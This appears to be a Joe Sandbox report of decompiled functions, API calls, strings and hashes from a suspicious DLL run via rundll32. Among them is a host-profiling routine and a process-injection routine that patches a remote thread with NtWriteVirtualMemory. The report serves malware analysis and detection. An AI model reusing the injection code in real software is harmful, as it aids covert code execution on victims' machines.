Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_image_get_linesizemv_pix_fmt_desc_get
String ID: Picture size %ux%u is invalid
API String ID: 645864070-1963597007
Opcode ID: 0946b3bcac33ba6fca7acdb6ca24e0fe7ad52919dc498f119e2a3142e05806b9
Instruction ID: c32bc821c07fb99167277532678e70ae68b76ab36c526d85f24e74df5a32105a
Opcode Fuzzy Hash: 0946b3bcac33ba6fca7acdb6ca24e0fe7ad52919dc498f119e2a3142e05806b9
Instruction Fuzzy Hash: C7215E75A083559FC704CF69C48020EFBE1FBC8710F958A2EF9A897350D7B5E9048B46

Uniqueness

Uniqueness Score: -1.00%

Function 1002E43C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E1002E43C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v16;
				intOrPtr _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				void* _t18;
				intOrPtr _t31;
				intOrPtr* _t34;

				 *_t34 =  &_v16;
				_t18 = L1002B8B0(_a4, _a12, _a8);
				if(_t18 == 0) {
					L6:
					return 0xabafb008;
				}
				_t31 = _v16;
				if(_t31 == 0) {
					goto L6;
				}
				if( *((intOrPtr*)(_t18 + 0xc)) != 0xd) {
					_v52 = "The value for option \'%s\' is not a %s format.\n";
					_v56 = 0x10;
					_v44 = _a8;
					_v48 = "sample";
					 *_t34 = _a4;
					E10026560();
					return 0xffffffea;
				}
				 *_a16 =  *((intOrPtr*)(_t31 +  *((intOrPtr*)(_t18 + 8))));
				return 0;
			}

0x1002e44b
0x1002e456
0x1002e45d
0x1002e4b5
0x00000000
0x1002e4b5
0x1002e45f
0x1002e465
0x00000000
0x00000000
0x1002e46b
0x1002e48d
0x1002e491
0x1002e495
0x1002e49e
0x1002e4a6
0x1002e4a9
0x00000000
0x1002e4ae
0x1002e477
0x00000000

APIs

Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908

mv_log.F086 ref: 1002E4A9

Strings

sample, xrefs: 1002E499
The value for option '%s' is not a %s format., xrefs: 1002E483

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strcmp$mv_log
String ID: The value for option '%s' is not a %s format.$sample
API String ID: 2835281190-3983800382
Opcode ID: f5f5e1db834bc02c8d1f8d4e6b274bacd7e5ca34d8842da282809734814b002e
Instruction ID: 24d4803273969bdf5ac517b635905fb994549115ec294322d3153323df2d4d09
Opcode Fuzzy Hash: f5f5e1db834bc02c8d1f8d4e6b274bacd7e5ca34d8842da282809734814b002e
Instruction Fuzzy Hash: C001A2786487818FC700DF29D08091AB7F2FB89350F95892DE99887360D739EC418B82

Uniqueness

Uniqueness Score: -1.00%

Function 1002E542 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908

mv_channel_layout_copy.F086 ref: 1002E58D
mv_log.F086 ref: 1002E5C1

Strings

The value for option '%s' is not a channel layout., xrefs: 1002E5A8

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strcmp$mv_channel_layout_copymv_log
String ID: The value for option '%s' is not a channel layout.
API String ID: 3662905369-3477801521
Opcode ID: a0beb69c1654b65415c70491f5d146282333a6159417d5f317bf65ca5f97ae25
Instruction ID: 8c388eaf2947d92ae89fe11a4375cf88f0abf7b9dee68859406d060f25dfbf9e
Opcode Fuzzy Hash: a0beb69c1654b65415c70491f5d146282333a6159417d5f317bf65ca5f97ae25
Instruction Fuzzy Hash: 6201DC78A19B419FC784DF28D080A1AB7E1FF88354F81882EF89983311E634EC408B82

Uniqueness

Uniqueness Score: -1.00%

Function 1002E3C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E1002E3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v16;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				void* _t18;
				intOrPtr _t31;
				intOrPtr* _t34;

				 *_t34 =  &_v16;
				_t18 = L1002B8B0(_a4, _a12, _a8);
				if(_t18 == 0) {
					L6:
					return 0xabafb008;
				}
				_t31 = _v16;
				if(_t31 == 0) {
					goto L6;
				}
				if( *((intOrPtr*)(_t18 + 0xc)) != 0xc) {
					_v52 = "The value for option \'%s\' is not a %s format.\n";
					_v56 = 0x10;
					_v44 = _a8;
					_v48 = 0x100b78a0;
					 *_t34 = _a4;
					E10026560();
					return 0xffffffea;
				}
				 *_a16 =  *((intOrPtr*)(_t31 +  *((intOrPtr*)(_t18 + 8))));
				return 0;
			}

0x1002e3cb
0x1002e3d6
0x1002e3dd
0x1002e435
0x00000000
0x1002e435
0x1002e3df
0x1002e3e5
0x00000000
0x00000000
0x1002e3eb
0x1002e40d
0x1002e411
0x1002e415
0x1002e41e
0x1002e426
0x1002e429
0x00000000
0x1002e42e
0x1002e3f7
0x00000000

APIs

Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908

mv_log.F086 ref: 1002E429

Strings

pixel, xrefs: 1002E419
The value for option '%s' is not a %s format., xrefs: 1002E403

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: strcmp$mv_log
String ID: The value for option '%s' is not a %s format.$pixel
API String ID: 2835281190-1801304947
Opcode ID: 74d3c326208ced39a7e621591af8db260eb8e46ed0a12fe7f96116a714d8054d
Instruction ID: 2db19661b65d9fea08d7a077c7d71974f084c1656edb1fac65c3c7ca3a026336
Opcode Fuzzy Hash: 74d3c326208ced39a7e621591af8db260eb8e46ed0a12fe7f96116a714d8054d
Instruction Fuzzy Hash: F501AE78A487818FC300DF29D094A1ABBF1FB89350F95896EE99887320E735DD418B42

Uniqueness

Uniqueness Score: -1.00%

Function 1000C461 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

mv_bprint_init_for_buffer.F086 ref: 1000C4A8
mv_bprintf.F086 ref: 1000C4D0

Strings

none, xrefs: 1000C4C7

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init_for_buffermv_bprintf
String ID: none
API String ID: 2490314137-2140143823
Opcode ID: fb99da9c4718ad6228832967d969a5fa7994f6f45e19e41f4cd0f504848537d0
Instruction ID: a25a21bf0bbbab6eb8dd7b885bea08568b6db38ddaeda7311d16c5a577b3c9a6
Opcode Fuzzy Hash: fb99da9c4718ad6228832967d969a5fa7994f6f45e19e41f4cd0f504848537d0
Instruction Fuzzy Hash: 910186B4904B568BD720DF24D880B9BB3E4FFC4384F52492DEA9853245D330BD858B93

Uniqueness

Uniqueness Score: -1.00%

Function 10012408 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E10012408(char* __ebx, intOrPtr __esi, intOrPtr _a4, char* _a8, intOrPtr _a12, intOrPtr _a144, intOrPtr _a148) {
				char* _t14;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr* _t22;

				_t19 = __esi;
				_t14 = __ebx;
				_a12 = __esi;
				_a4 = 0x20;
				 *_t22 = __ebx;
				_a8 = ".%06dZ";
				L100067F0(".%06dZ", __ebx, _t18, __esi);
				_a8 = _t14;
				_a12 = 0;
				_a4 = _a148;
				 *_t22 = _a144;
				return E10011210(_t14, _t18, _t19, _t21);
			}

0x10012408
0x10012408
0x10012410
0x1001241e
0x10012422
0x10012425
0x10012429
0x10012437
0x1001243b
0x1001243f
0x1001244a
0x1001245a

APIs

mv_strlcatf.F086 ref: 10012429

Part of subcall function 100067F0: strlen.MSVCRT ref: 1000680A

mv_dict_set.F086 ref: 1001244D

Strings

.%06dZ, xrefs: 10012419

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_dict_setmv_strlcatfstrlen
String ID: .%06dZ
API String ID: 1014950348-3752268379
Opcode ID: 112283aaecfa77c8f98fb54c5a0ced329aef4e4efddc2c3c9d6336029b181351
Instruction ID: 95eb8ff42823485582616919598dcae06947ee25e4005e9b3a20f874dc0564a5
Opcode Fuzzy Hash: 112283aaecfa77c8f98fb54c5a0ced329aef4e4efddc2c3c9d6336029b181351
Instruction Fuzzy Hash: DAE04EB5908740AFD714DF29E48175ABBE0FB88354F51C82EB49C97306D63898418B46

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 5500, Parent PID: 7012COMMON

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.9%
Total number of Nodes:	1432
Total number of Limit Nodes:	7

Executed Functions

Function 041BBB4D Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E041BBB4D(void* __edx, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t70;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t77;
				intOrPtr* _t79;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t89;
				intOrPtr _t91;
				void* _t92;
				intOrPtr _t94;
				intOrPtr _t95;
				void* _t96;
				void* _t100;
				intOrPtr _t102;
				intOrPtr _t104;
				short _t109;
				char _t111;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t122;
				intOrPtr _t126;
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr _t141;
				intOrPtr _t144;
				intOrPtr _t146;
				intOrPtr _t152;
				void* _t153;
				WCHAR* _t154;
				char* _t155;
				intOrPtr _t166;
				intOrPtr _t182;
				void* _t198;
				struct _OSVERSIONINFOA* _t199;
				void* _t200;
				void* _t202;
				char _t205;
				void* _t206;
				char* _t207;
				void* _t210;
				int* _t211;
				void* _t224;

				_t224 = __fp0;
				_t152 =  *0x41d0fa8; // 0x41b0000
				_t70 = E041B911F(0x1ac4);
				_t199 = _t70;
				if(_t199 != 0) {
					 *((intOrPtr*)(_t199 + 0x1640)) = GetCurrentProcessId();
					_t72 =  *0x41d0fa0; // 0x439f8a0
					_t73 =  *((intOrPtr*)(_t72 + 0xb0))(_t200);
					_t3 = _t199 + 0x648; // 0x648
					E041C4A2A( *((intOrPtr*)(_t199 + 0x1640)) + _t73, _t3);
					_t75 =  *0x41d0fa0; // 0x439f8a0
					_t5 = _t199 + 0x1644; // 0x1644
					_t201 = _t5;
					_push(0x105);
					_push(_t5);
					_push(0);
					if( *((intOrPtr*)(_t75 + 0x12c))() != 0) {
						 *((intOrPtr*)(_t199 + 0x1854)) = E041B9547(_t201);
					}
					_t77 =  *0x41d0fa0; // 0x439f8a0
					_t79 = E041BDC33( *((intOrPtr*)(_t77 + 0x130))()); // executed
					 *((intOrPtr*)(_t199 + 0x110)) = _t79;
					_t163 =  *_t79;
					if(E041BDDAE( *_t79) == 0) {
						_t81 = E041BDC83(_t163, _t201); // executed
						__eflags = _t81;
						_t166 = (0 | _t81 > 0x00000000) + 1;
						__eflags = _t166;
						 *((intOrPtr*)(_t199 + 0x214)) = _t166;
					} else {
						 *((intOrPtr*)(_t199 + 0x214)) = 3;
					}
					_t14 = _t199 + 0x220; // 0x220, executed
					_t82 = E041BE5A6(_t14); // executed
					 *((intOrPtr*)(_t199 + 0x218)) = _t82;
					_t83 = E041BE56B(_t14); // executed
					 *((intOrPtr*)(_t199 + 0x21c)) = _t83;
					_t17 = _t199 + 0x114; // 0x114
					_t202 = _t17;
					 *((intOrPtr*)(_t199 + 0x224)) = _t152;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t202);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x110)))));
					_t89 =  *0x41d0fc8; // 0x439fb00
					_push(0); // executed
					if( *((intOrPtr*)(_t89 + 0x6c))() == 0) {
						GetLastError();
					}
					_t91 =  *0x41d0fc0; // 0x439fa38
					_t92 =  *((intOrPtr*)(_t91 + 0x3c))(0x1000);
					_t28 = _t199 + 0x228; // 0x228
					_t153 = _t28;
					 *(_t199 + 0x1850) = 0 | _t92 > 0x00000000;
					if( *0x41d0fa4 != 2) {
						E041BBA56( *((intOrPtr*)(_t199 + 0x224)), _t153);
					} else {
						E041BBB20(_t153);
					}
					_t94 =  *0x41d0fa4; // 0x1
					 *((intOrPtr*)(_t199 + 0xa0)) = _t94;
					_t219 = _t153;
					if(_t153 != 0) {
						 *((intOrPtr*)(_t199 + 0x434)) = E041B9547(_t153);
					}
					_t95 = E041BD130();
					_t35 = _t199 + 0xb0; // 0xb0
					_t203 = _t35;
					 *((intOrPtr*)(_t199 + 0xac)) = _t95;
					_t96 = E041BCF1D(_t35, _t219, _t224);
					_t37 = _t199 + 0xd0; // 0xd0
					E041B98A9(_t96, _t35, _t37);
					_t38 = _t199 + 0x438; // 0x438
					E041B955E(_t153, _t38);
					_t100 = E041BE605(_t203, E041BCE25(_t35), 0);
					_t39 = _t199 + 0x100c; // 0x100c
					E041BD146(_t100, _t39, _t224);
					_t102 =  *0x41d0fa0; // 0x439f8a0
					_t104 = E041BDE00( *((intOrPtr*)(_t102 + 0x130))(_t202)); // executed
					 *((intOrPtr*)(_t199 + 0x101c)) = _t104;
					E041B92A2(_t199, 0, 0x9c);
					_t211 = _t210 + 0xc;
					_t199->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t199);
					 *((intOrPtr*)(_t199 + 0xa8)) = E041BB85A(_t103);
					_t109 = E041BB883(_t108);
					_t43 = _t199 + 0x1020; // 0x1020
					_t154 = _t43;
					 *((short*)(_t199 + 0x9c)) = _t109;
					GetWindowsDirectoryW(_t154, 0x104);
					_t111 = E041B90EA(_t108, 0x83);
					_t182 =  *0x41d0fa0; // 0x439f8a0
					_t205 = _t111;
					 *_t211 = 0x104;
					_push( &_v668);
					_push(_t205);
					_v8 = _t205;
					if( *((intOrPtr*)(_t182 + 0xf0))() == 0) {
						_t146 =  *0x41d0fa0; // 0x439f8a0
						 *((intOrPtr*)(_t146 + 0x10c))(_t205, _t154);
					}
					E041B9D66( &_v8);
					_t116 =  *0x41d0fa0; // 0x439f8a0
					_t50 = _t199 + 0x1434; // 0x1434
					_t206 = _t50;
					 *_t211 = 0x209;
					_push(_t206);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t116 + 0xf0))() == 0) {
						E041BC08E(_t206, 0x105, L"%s\\%s", _t154);
						_t144 =  *0x41d0fa0; // 0x439f8a0
						_t211 =  &(_t211[5]);
						 *((intOrPtr*)(_t144 + 0x10c))(L"USERPROFILE", _t206, "TEMP");
					}
					_push(0x20a);
					_t53 = _t199 + 0x122a; // 0x122a
					_t155 = L"TEMP";
					_t119 =  *0x41d0fa0; // 0x439f8a0
					_push(_t155);
					if( *((intOrPtr*)(_t119 + 0xf0))() == 0) {
						_t141 =  *0x41d0fa0; // 0x439f8a0
						 *((intOrPtr*)(_t141 + 0x10c))(_t155, _t206);
					}
					_push(0x40);
					_t207 = L"SystemDrive";
					_push( &_v144);
					_t122 =  *0x41d0fa0; // 0x439f8a0
					_push(_t207);
					if( *((intOrPtr*)(_t122 + 0xf0))() == 0) {
						_t139 =  *0x41d0fa0; // 0x439f8a0
						 *((intOrPtr*)(_t139 + 0x10c))(_t207, L"C:");
					}
					_v8 = 0x7f;
					_t61 = _t199 + 0x199c; // 0x199c
					_t126 =  *0x41d0fa0; // 0x439f8a0
					 *((intOrPtr*)(_t126 + 0xc0))(_t61,  &_v8);
					_t64 = _t199 + 0x100c; // 0x100c
					E041C4A2A(E041BE605(_t64, E041BCE25(_t64), 0),  &_v2644);
					_t65 = _t199 + 0x1858; // 0x1858
					E041C49FC( &_v2644, _t65, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t68 = _t199 + 0x1878; // 0x1878
					_t198 = 0x14;
					E041B962B(_t68, _t198);
					_t137 = E041BB501(_t68, _t198); // executed
					 *((intOrPtr*)(_t199 + 0x1898)) = _t137;
					return _t199;
				}
				return _t70;
			}

0x041bbb4d
0x041bbb57
0x041bbb63
0x041bbb68
0x041bbb6d
0x041bbb7a
0x041bbb80
0x041bbb85
0x041bbb8b
0x041bbb9b
0x041bbba0
0x041bbba5
0x041bbba5
0x041bbbad
0x041bbbb2
0x041bbbb3
0x041bbbbd
0x041bbbc6
0x041bbbc6
0x041bbbcc
0x041bbbd9
0x041bbbde
0x041bbbe4
0x041bbbed
0x041bbbfb
0x041bbc02
0x041bbc07
0x041bbc07
0x041bbc08
0x041bbbef
0x041bbbef
0x041bbbef
0x041bbc0e
0x041bbc14
0x041bbc19
0x041bbc1f
0x041bbc24
0x041bbc2a
0x041bbc2a
0x041bbc33
0x041bbc39
0x041bbc3d
0x041bbc44
0x041bbc4b
0x041bbc52
0x041bbc56
0x041bbc5d
0x041bbc5e
0x041bbc60
0x041bbc65
0x041bbc6c
0x041bbc6e
0x041bbc6e
0x041bbc74
0x041bbc7e
0x041bbc83
0x041bbc83
0x041bbc8e
0x041bbc9b
0x041bbcae
0x041bbc9d
0x041bbc9f
0x041bbc9f
0x041bbcb3
0x041bbcb8
0x041bbcbe
0x041bbcc0
0x041bbcc9
0x041bbcc9
0x041bbcd1
0x041bbcd6
0x041bbcd6
0x041bbcdc
0x041bbce7
0x041bbcec
0x041bbcf4
0x041bbcfa
0x041bbd02
0x041bbd14
0x041bbd1a
0x041bbd22
0x041bbd27
0x041bbd34
0x041bbd45
0x041bbd4b
0x041bbd50
0x041bbd53
0x041bbd56
0x041bbd63
0x041bbd69
0x041bbd73
0x041bbd73
0x041bbd79
0x041bbd81
0x041bbd8c
0x041bbd91
0x041bbd97
0x041bbd99
0x041bbda6
0x041bbda7
0x041bbda8
0x041bbdb3
0x041bbdb5
0x041bbdbc
0x041bbdbc
0x041bbdc6
0x041bbdcb
0x041bbdd0
0x041bbdd0
0x041bbdd6
0x041bbddd
0x041bbdde
0x041bbdeb
0x041bbdfe
0x041bbe03
0x041bbe08
0x041bbe11
0x041bbe11
0x041bbe17
0x041bbe1c
0x041bbe22
0x041bbe28
0x041bbe2d
0x041bbe36
0x041bbe38
0x041bbe3f
0x041bbe3f
0x041bbe45
0x041bbe4d
0x041bbe52
0x041bbe53
0x041bbe58
0x041bbe61
0x041bbe63
0x041bbe6e
0x041bbe6e
0x041bbe77
0x041bbe7f
0x041bbe86
0x041bbe8b
0x041bbe9a
0x041bbeb2
0x041bbeb9
0x041bbec7
0x041bbed2
0x041bbed3
0x041bbed7
0x041bbedd
0x041bbede
0x041bbee6
0x041bbeeb
0x00000000
0x041bbef3
0x041bbef7

APIs

GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 041BBB74
GetLastError.KERNEL32(?,?,00000000), ref: 041BBC6E
GetVersionExA.KERNEL32(00000000,?,?,00000000), ref: 041BBD56

Part of subcall function 041BDC83: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,041B0000), ref: 041BDD27

GetWindowsDirectoryW.KERNEL32(00001020,00000104,?,?,00000000), ref: 041BBD81

Strings

TEMP, xrefs: 041BBE22, 041BBE2D, 041BBE3E
TEMP, xrefs: 041BBDED
USERPROFILE, xrefs: 041BBDDE, 041BBE0C
SystemDrive, xrefs: 041BBE4D, 041BBE58, 041BBE6D
%s\%s, xrefs: 041BBDF3

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: ChangeCloseCurrentDirectoryErrorFindLastNotificationProcessVersionWindows
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3040727122-2706916422
Opcode ID: e8f246cfe19cea86165f1b1fd16d51cdb922dbc18f0847f06641af39c55265c4
Instruction ID: c22a8391e2b6536525f2420da00a6ef96ea46f04550ee5c18377193e4ecea3db
Opcode Fuzzy Hash: e8f246cfe19cea86165f1b1fd16d51cdb922dbc18f0847f06641af39c55265c4
Instruction Fuzzy Hash: 0FA18D71701605AFE708EF71D888BEEBBA8FF08308F004169E59997241EB74BA45CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 041BA823 Relevance: 6.1, APIs: 4, Instructions: 104
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E041BA823(void* __ecx, void** __edx, intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v15;
				void _v16;
				long _v20;
				void* _v24;
				long _v28;
				void* _v32;
				struct _CONTEXT _v748;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t39;
				void* _t41;
				void _t49;
				intOrPtr _t66;
				void* _t68;
				long _t70;
				void* _t73;
				void** _t77;
				void* _t80;

				_t37 =  *0x41d0fd8; // 0x439fc50
				_t77 = __edx;
				_t68 = __ecx;
				if(( *(_t37 + 0x1898) & 0x00fe0286) == 0) {
					_t38 =  *0x41d10b0;
				} else {
					_t38 = E041BA222(__ecx, __edx);
					 *0x41d10b0 = _t38;
				}
				if(_t38 == 0) {
					_t66 =  *0x41d0fe4; // 0x439f9f0
					 *0x41d10b0 = _t66;
				}
				_t39 = E041BA412( *_t77, _a4); // executed
				_t80 = _t39;
				if(_t80 == 0) {
					L13:
					E041BA356();
					_t41 = _t80;
					goto L14;
				} else {
					E041B92A2( &_v748, 0, 0x2cc);
					_v748.ContextFlags = 0x10002;
					if(GetThreadContext(_t77[1],  &_v748) == 0) {
						goto L13;
					}
					_v20 = _v20 & 0x00000000;
					_t73 = _v748.Eax;
					_t49 = _t80 - _a4 + _t68;
					if(_a8 != 1) {
						if(_a8 != 2) {
							_t41 = 0;
							L14:
							return _t41;
						}
						_v16 = _t49;
						_t70 = 8;
						L11:
						_v32 = _t73;
						_v24 = _t73;
						_v8 = _t70;
						NtProtectVirtualMemory( *_t77,  &_v24,  &_v8, 4,  &_v20);
						if(NtWriteVirtualMemory( *_t77, _v748.Eax,  &_v16, _t70,  &_v8) >= 0) {
							_v28 = _v28 & 0x00000000;
							NtProtectVirtualMemory( *_t77,  &_v32,  &_v8, _v20,  &_v28);
						} else {
							_t80 = 0;
						}
						goto L13;
					}
					_v16 = 0xe9;
					_t70 = 5;
					_v15 = _t49 - _t73 - _t70;
					goto L11;
				}
			}

0x041ba826
0x041ba83e
0x041ba840
0x041ba842
0x041ba850
0x041ba844
0x041ba844
0x041ba849
0x041ba849
0x041ba857
0x041ba859
0x041ba85e
0x041ba85e
0x041ba868
0x041ba86d
0x041ba871
0x041ba923
0x041ba923
0x041ba928
0x00000000
0x041ba877
0x041ba885
0x041ba88d
0x041ba8ae
0x00000000
0x00000000
0x041ba8b0
0x041ba8b9
0x041ba8bf
0x041ba8c5
0x041ba8db
0x041ba94e
0x041ba92a
0x041ba92e
0x041ba92e
0x041ba8df
0x041ba8e2
0x041ba8e3
0x041ba8e6
0x041ba8ef
0x041ba8f6
0x041ba901
0x041ba91f
0x041ba92f
0x041ba949
0x041ba921
0x041ba921
0x041ba921
0x00000000
0x041ba91f
0x041ba8cb
0x041ba8cf
0x041ba8d2
0x00000000
0x041ba8d2

APIs

GetThreadContext.KERNELBASE(?,00010002), ref: 041BA8A6
NtProtectVirtualMemory.NTDLL(?,?,00000001,00000004,00000000), ref: 041BA901
NtWriteVirtualMemory.NTDLL(?,?,00000002,00000008,00000001), ref: 041BA91A

Part of subcall function 041BA222: LoadLibraryW.KERNEL32(00000000), ref: 041BA2F2

NtProtectVirtualMemory.NTDLL(?,?,00000001,00000000,00000000), ref: 041BA949

